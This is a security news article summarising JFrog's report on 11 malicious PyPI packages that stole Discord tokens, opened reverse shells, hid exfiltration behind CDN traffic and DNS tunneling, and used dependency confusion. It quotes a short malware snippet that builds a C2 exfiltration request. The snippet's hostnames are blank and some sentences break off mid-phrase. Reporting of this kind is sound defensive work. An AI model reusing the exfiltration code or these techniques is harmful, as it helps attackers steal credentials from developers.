Experts found 11 malicious Python packages in the PyPI repository

Pierluigi Paganini November 21, 2021

Researchers discovered 11 malicious Python packages in the PyPI repository that can steal Discord access tokens, passwords, and conduct attacks.

JFrog researchers have discovered 11 malicious Python packages in the Python Package Index (PyPI) repository that can steal Discord access tokens, passwords, and even carry out dependency confusion attacks.

Below is the list of malicious Python packages:

  • importantpackage / important-package
  • pptest
  • ipboards
  • owlmoon
  • DiscordSafety
  • trrfab
  • 10Cent10 / 10Cent11
  • yandex-yt
  • yiffparty

The packages “importantpackage,” “10Cent10,” and “10Cent11” were able to establish a reverse shell on the compromised machine.

Experts pointed out that the “importantpackage” abused CDN TLS termination for data exfiltration. It uses the Fastly CDN to disguise communications with the C2 server as a communication with

“The malware’s communication is quite simple:

url = "" + "/images" + "?" + "guid=" + b64_payload
r = request.Request(url, headers = {'Host': ""})

This code causes an HTTPS request to be sent to (which is indistinguishable from a legitimate request to PyPI,) which later gets rerouted by the CDN as an HTTP request to the C2 server (and vice versa, allowing for two-way communication).” states the report published by JFrog.

The “ipboards” and “trrfab” packages were able to exfiltrate sensitive information by using a technique called dependency confusion.

The dependency confusion technique consists of uploading tainted components that have the same name as the legitimate internal private packages, but with a higher version and uploaded to public repositories. This technique tricks the target’s package manager into downloading and installing the malicious module.

The “ipboards” and “pptest” packages were discovered using DNS tunneling for data exfiltration, this is the first time that this technique has been used by malicious pac in malware uploaded to PyPI.

“While this set of malicious packages may not have the same ‘teeth’ as our previous discoveries, what’s notable is the increasing level of sophistication with which they are executed. It’s not reaching for your wallet in broad daylight – but there is a lot more subterfuge going on with these packages, and some of them may even be setting up for a follow-up attack after the initial reconnaissance, instead of running a highly-compromising payload to start.” concludes the report.

Follow me on Twitter: @securityaffairs and Facebook

[adrotate banner=”9″][adrotate banner=”12″]

Pierluigi Paganini

(SecurityAffairs – hacking, Operation Cyclone)

[adrotate banner=”5″]

[adrotate banner=”13″]

you might also like

leave a comment